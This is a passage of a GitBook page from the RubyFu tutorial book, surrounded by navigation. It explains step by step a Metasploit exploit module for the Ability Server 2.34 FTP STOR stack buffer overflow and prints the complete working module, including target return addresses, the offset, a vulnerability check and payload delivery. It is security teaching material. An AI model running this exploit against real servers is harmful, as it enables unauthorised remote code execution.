+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter active" data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="exploit-module"><a name="exploit-module" class="plugin-anchor" href="#exploit-module"><span class="fa fa-link"></span></a>Exploit module</h1>
1207
+ <h2 id="remote-exploit"><a name="remote-exploit" class="plugin-anchor" href="#remote-exploit"><span class="fa fa-link"></span></a>Remote Exploit</h2>
1208
+ <h3 id="ftp-exploit"><a name="ftp-exploit" class="plugin-anchor" href="#ftp-exploit"><span class="fa fa-link"></span></a>FTP exploit</h3>
1209
+ <p>Our example will be a very simple vulnerable FTP server called ability server.</p>
1210
+ <h4 id="what-do-we-want"><a name="what-do-we-want" class="plugin-anchor" href="#what-do-we-want"><span class="fa fa-link"></span></a>What do we want?</h4>
1211
+ <ul>
1212
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Create Exploit module</li>
1213
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Exploit FTP Server</li>
1214
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Set exploit rank</li>
1215
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Describe The module</li>
1216
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Let people know we created this module</li>
1217
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Add references about the vulnerability that we exploit</li>
1218
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Choose a default payload </li>
1219
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Set the Bad characters.</li>
1220
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Set Disclosure Date</li>
1221
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Targets and it&apos;s return address (EIP offset)</li>
1222
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Options to set the target IP, port. Also username and password if required.</li>
1223
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check the target if vulnerable.</li>
1224
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Send the exploit</li>
1225
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if the module has been written correctly (msftidy.rb)</li>
1226
+ </ul>
1227
+ <h4 id="steps"><a name="steps" class="plugin-anchor" href="#steps"><span class="fa fa-link"></span></a>Steps</h4>
1228
+ <ul>
1229
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Create Exploit module</li>
1230
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Exploit FTP Server</li>
1231
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Put a rank for the module</li>
1232
+ </ul>
1233
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1234
+ <span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
1235
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1236
+ <span class="hljs-comment">##</span>
1237
+
1238
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1239
+
1240
+ <span class="hljs-comment">### Module Type ###</span>
1241
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Exploit</span></span>::<span class="hljs-title">Remote</span></span>
1242
+ <span class="hljs-constant">Rank</span> = <span class="hljs-constant">NormalRanking</span>
1243
+
1244
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::Ftp</span>
1245
+ </code></pre>
1246
+ <ul>
1247
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Describe The module</li>
1248
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Let people know we created this module</li>
1249
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Add references about the vulnerability that we exploit</li>
1250
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Choose a default payload </li>
1251
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Set the Bad characters.</li>
1252
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Set Disclosure Date</li>
1253
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Targets and it&apos;s return address (EIP offset)</li>
1254
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Options to set the target IP, port. Also username and password if required.</li>
1255
+ </ul>
1256
+ <pre><code class="lang-ruby"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1257
+ <span class="hljs-keyword">super</span>(update_info(
1258
+ info,
1259
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;Ability Server 2.34 STOR Command Stack Buffer Overflow&apos;</span>,
1260
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{
1261
+ This module exploits a stack-based buffer overflow in Ability Server 2.34.
1262
+ Ability Server fails to check input size when parsing &apos;STOR&apos; and &apos;APPE&apos; commands,
1263
+ which leads to a stack based buffer overflow. This plugin uses the &apos;STOR&apos; command.
1264
+
1265
+ The vulnerability has been confirmed on version 2.34 and has also been reported
1266
+ in version 2.25 and 2.32. Other versions may also be affected.}</span>,
1267
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1268
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1269
+ [
1270
+ <span class="hljs-string">&apos;muts&apos;</span>, <span class="hljs-comment"># Initial discovery</span>
1271
+ <span class="hljs-string">&apos;Dark Eagle&apos;</span>, <span class="hljs-comment"># same as muts</span>
1272
+ <span class="hljs-string">&apos;Peter Osterberg&apos;</span>, <span class="hljs-comment"># Metasploit</span>
1273
+ <span class="hljs-string">&apos;Ruby (@Rubyfu)&apos;</span>, <span class="hljs-comment"># Just explain the module</span>
1274
+ ],
1275
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1276
+ [
1277
+ [ <span class="hljs-string">&apos;CVE&apos;</span>, <span class="hljs-string">&apos;2004-1626&apos;</span> ],
1278
+ [ <span class="hljs-string">&apos;OSVDB&apos;</span>, <span class="hljs-string">&apos;11030&apos;</span>],
1279
+ [ <span class="hljs-string">&apos;EDB&apos;</span>, <span class="hljs-string">&apos;588&apos;</span>],
1280
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;http://rubyfu.net&apos;</span>] <span class="hljs-comment"># Just explain the module</span>
1281
+ ],
1282
+ <span class="hljs-string">&apos;Platform&apos;</span> =&gt; <span class="hljs-string">%w{ win }</span>,
1283
+ <span class="hljs-string">&apos;Targets&apos;</span> =&gt;
1284
+ [
1285
+ [
1286
+ <span class="hljs-string">&apos;Windows XP SP2 ENG&apos;</span>,
1287
+ {
1288
+ <span class="hljs-comment">#JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)</span>
1289
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x73E32ECF</span>,
1290
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1291
+ }
1292
+ ],
1293
+ [
1294
+ <span class="hljs-string">&apos;Windows XP SP3 ENG&apos;</span>,
1295
+ {
1296
+ <span class="hljs-comment">#JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)</span>
1297
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x7E429353</span>,
1298
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1299
+ }
1300
+ ],
1301
+ ],
1302
+ <span class="hljs-string">&apos;DefaultTarget&apos;</span> =&gt; <span class="hljs-number">0</span>,
1303
+ <span class="hljs-string">&apos;DisclosureDate&apos;</span> =&gt; <span class="hljs-string">&apos;Oct 22 2004&apos;</span>
1304
+ ))
1305
+
1306
+ register_options(
1307
+ [
1308
+ <span class="hljs-constant">Opt::RPORT</span>(<span class="hljs-number">21</span>),
1309
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPUSER&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ]),
1310
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPPASS&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP password for username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ])
1311
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1312
+ <span class="hljs-keyword">end</span>
1313
+ </code></pre>
1314
+ <ul>
1315
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check the target if vulnerable.</li>
1316
+ </ul>
1317
+ <pre><code class="lang-ruby"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check</span></span>
1318
+ connect
1319
+ disconnect
1320
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server 2\.34/</span>
1321
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Appears</span>
1322
+ <span class="hljs-keyword">else</span>
1323
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server/</span>
1324
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Detected</span>
1325
+ <span class="hljs-keyword">end</span>
1326
+ <span class="hljs-keyword">end</span>
1327
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Safe</span>
1328
+ <span class="hljs-keyword">end</span>
1329
+ </code></pre>
1330
+ <ul>
1331
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Send the exploit</li>
1332
+ </ul>
1333
+ <pre><code class="lang-ruby"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exploit</span></span>
1334
+ c = connect_login
1335
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> c
1336
+
1337
+ myhost = datastore[<span class="hljs-string">&apos;LHOST&apos;</span>] == <span class="hljs-string">&apos;0.0.0.0&apos;</span> ? <span class="hljs-constant">Rex::Socket</span>.source_address <span class="hljs-symbol">:</span> datastore[<span class="hljs-string">&apos;LHOST&apos;</span>]
1338
+
1339
+ <span class="hljs-comment"># Take client IP address + FTP user lengths into account for EIP offset</span>
1340
+ padd_size = target[<span class="hljs-string">&apos;Offset&apos;</span>] + (<span class="hljs-number">13</span> - myhost.length) + (<span class="hljs-number">3</span> - datastore[<span class="hljs-string">&apos;FTPUSER&apos;</span>].length)
1341
+ junk = rand_text_alpha(padd_size)
1342
+
1343
+ sploit = junk
1344
+ sploit &lt;&lt; [target.ret].pack(<span class="hljs-string">&apos;V&apos;</span>)
1345
+ sploit &lt;&lt; make_nops(<span class="hljs-number">32</span>)
1346
+ sploit &lt;&lt; payload.encoded
1347
+ sploit &lt;&lt; rand_text_alpha(sploit.length)
1348
+
1349
+ send_cmd([<span class="hljs-string">&apos;STOR&apos;</span>, sploit], <span class="hljs-keyword">false</span>)
1350
+ handler
1351
+ disconnect
1352
+ <span class="hljs-keyword">end</span>
1353
+ </code></pre>
1354
+ <h3 id="wrapping-up"><a name="wrapping-up" class="plugin-anchor" href="#wrapping-up"><span class="fa fa-link"></span></a>Wrapping up</h3>
1355
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1356
+ <span class="hljs-comment"># This module requires Metasploit: http://metasploit.com/download</span>
1357
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1358
+ <span class="hljs-comment">##</span>
1359
+
1360
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1361
+
1362
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Exploit</span></span>::<span class="hljs-title">Remote</span></span>
1363
+ <span class="hljs-constant">Rank</span> = <span class="hljs-constant">NormalRanking</span>
1364
+
1365
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::Ftp</span>
1366
+
1367
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1368
+ <span class="hljs-keyword">super</span>(update_info(
1369
+ info,
1370
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;Ability Server 2.34 STOR Command Stack Buffer Overflow&apos;</span>,
1371
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{
1372
+ This module exploits a stack-based buffer overflow in Ability Server 2.34.
1373
+ Ability Server fails to check input size when parsing &apos;STOR&apos; and &apos;APPE&apos; commands,
1374
+ which leads to a stack based buffer overflow. This plugin uses the &apos;STOR&apos; command.
1375
+
1376
+ The vulnerability has been confirmed on version 2.34 and has also been reported
1377
+ in version 2.25 and 2.32. Other versions may also be affected.}</span>,
1378
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1379
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1380
+ [
1381
+ <span class="hljs-string">&apos;muts&apos;</span>, <span class="hljs-comment"># Initial discovery</span>
1382
+ <span class="hljs-string">&apos;Dark Eagle&apos;</span>, <span class="hljs-comment"># same as muts</span>
1383
+ <span class="hljs-string">&apos;Peter Osterberg&apos;</span>, <span class="hljs-comment"># Metasploit</span>
1384
+ <span class="hljs-string">&apos;Ruby (@Rubyfu)&apos;</span>, <span class="hljs-comment"># Just explain the module</span>
1385
+ ],
1386
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1387
+ [
1388
+ [ <span class="hljs-string">&apos;CVE&apos;</span>, <span class="hljs-string">&apos;2004-1626&apos;</span> ],
1389
+ [ <span class="hljs-string">&apos;OSVDB&apos;</span>, <span class="hljs-string">&apos;11030&apos;</span>],
1390
+ [ <span class="hljs-string">&apos;EDB&apos;</span>, <span class="hljs-string">&apos;588&apos;</span>],
1391
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;http://rubyfu.net&apos;</span>] <span class="hljs-comment"># Just explain the module</span>
1392
+ ],
1393
+ <span class="hljs-string">&apos;Platform&apos;</span> =&gt; <span class="hljs-string">%w{ win }</span>,
1394
+ <span class="hljs-string">&apos;Targets&apos;</span> =&gt;
1395
+ [
1396
+ [
1397
+ <span class="hljs-string">&apos;Windows XP SP2 ENG&apos;</span>,
1398
+ {
1399
+ <span class="hljs-comment">#JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)</span>
1400
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x73E32ECF</span>,
1401
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1402
+ }
1403
+ ],
1404
+ [
1405
+ <span class="hljs-string">&apos;Windows XP SP3 ENG&apos;</span>,
1406
+ {
1407
+ <span class="hljs-comment">#JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)</span>
1408
+ <span class="hljs-string">&apos;Ret&apos;</span> =&gt; <span class="hljs-number">0x7E429353</span>,
1409
+ <span class="hljs-string">&apos;Offset&apos;</span> =&gt; <span class="hljs-number">966</span>
1410
+ }
1411
+ ],
1412
+ ],
1413
+ <span class="hljs-string">&apos;DefaultTarget&apos;</span> =&gt; <span class="hljs-number">0</span>,
1414
+ <span class="hljs-string">&apos;DisclosureDate&apos;</span> =&gt; <span class="hljs-string">&apos;Oct 22 2004&apos;</span>
1415
+ ))
1416
+
1417
+ register_options(
1418
+ [
1419
+ <span class="hljs-constant">Opt::RPORT</span>(<span class="hljs-number">21</span>),
1420
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPUSER&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ]),
1421
+ <span class="hljs-constant">OptString</span>.new(<span class="hljs-string">&apos;FTPPASS&apos;</span>, [ <span class="hljs-keyword">true</span>, <span class="hljs-string">&apos;Valid FTP password for username&apos;</span>, <span class="hljs-string">&apos;ftp&apos;</span> ])
1422
+ ], <span class="hljs-keyword">self</span>.<span class="hljs-keyword">class</span>)
1423
+ <span class="hljs-keyword">end</span>
1424
+
1425
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check</span></span>
1426
+ connect
1427
+ disconnect
1428
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server 2\.34/</span>
1429
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Appears</span>
1430
+ <span class="hljs-keyword">else</span>
1431
+ <span class="hljs-keyword">if</span> banner =~ <span class="hljs-regexp">/Ability Server/</span>
1432
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Detected</span>
1433
+ <span class="hljs-keyword">end</span>
1434
+ <span class="hljs-keyword">end</span>
1435
+ <span class="hljs-keyword">return</span> <span class="hljs-constant">Exploit::CheckCode::Safe</span>
1436
+ <span class="hljs-keyword">end</span>
1437
+
1438
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exploit</span></span>
1439
+ c = connect_login
1440
+ <span class="hljs-keyword">return</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> c
1441
+
1442
+ myhost = datastore[<span class="hljs-string">&apos;LHOST&apos;</span>] == <span class="hljs-string">&apos;0.0.0.0&apos;</span> ? <span class="hljs-constant">Rex::Socket</span>.source_address <span class="hljs-symbol">:</span> datastore[<span class="hljs-string">&apos;LHOST&apos;</span>]
1443
+
1444
+ <span class="hljs-comment"># Take client IP address + FTP user lengths into account for EIP offset</span>
1445
+ padd_size = target[<span class="hljs-string">&apos;Offset&apos;</span>] + (<span class="hljs-number">13</span> - myhost.length) + (<span class="hljs-number">3</span> - datastore[<span class="hljs-string">&apos;FTPUSER&apos;</span>].length)
1446
+ junk = rand_text_alpha(padd_size)
1447
+
1448
+ sploit = junk
1449
+ sploit &lt;&lt; [target.ret].pack(<span class="hljs-string">&apos;V&apos;</span>)
1450
+ sploit &lt;&lt; make_nops(<span class="hljs-number">32</span>)
1451
+ sploit &lt;&lt; payload.encoded
1452
+ sploit &lt;&lt; rand_text_alpha(sploit.length)
1453
+
1454
+ send_cmd([<span class="hljs-string">&apos;STOR&apos;</span>, sploit], <span class="hljs-keyword">false</span>)
1455
+ handler
1456
+ disconnect
1457
+ <span class="hljs-keyword">end</span>
1458
+ <span class="hljs-keyword">end</span>
1459
+ </code></pre>
1460
+ <ul>
1461
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Check if the module has been written correctly (msftidy.rb)</li>
1462
+ </ul>
1463
+ <pre><code>metasploit-framework/tools/dev/msftidy.rb ability_server_stor.rb
1464
+ </code></pre>
1465
+
1466
+ </section>
1467
+
1468
+
1469
+ </div>
1470
+ </div>
1471
+ </div>
1472
+
1473
+
1474
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html" class="navigation navigation-prev " aria-label="Previous page: Auxiliary module"><i class="fa fa-angle-left"></i></a>
1475
+
1476
+
1477
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html" class="navigation navigation-next " aria-label="Next page: Meterpreter"><i class="fa fa-angle-right"></i></a>
1478
+
1479
+ </div>
1480
+ </div>
1481
+
1482
+
1483
+ <script src="../gitbook/app.js"></script>
1484
+
1485
+
1486
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1487
+
1488
+
1489
+
1490
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1491
+
1492
+
1493
+
1494
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1495
+
1496
+
1497
+
1498
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1499
+
1500
+
1501
+
1502
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1503
+
1504
+
1505
+
1506
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1507
+
1508
+
1509
+
1510
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1511
+
1512
+
1513
+ <script>
1514
+ require(["gitbook"], function(gitbook) {
1515
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1516
+ gitbook.start(config);
1517
+ });
1518
+ </script>
1519
+
1520
+
1521
+ </body>
1522
+
1523
+ </html>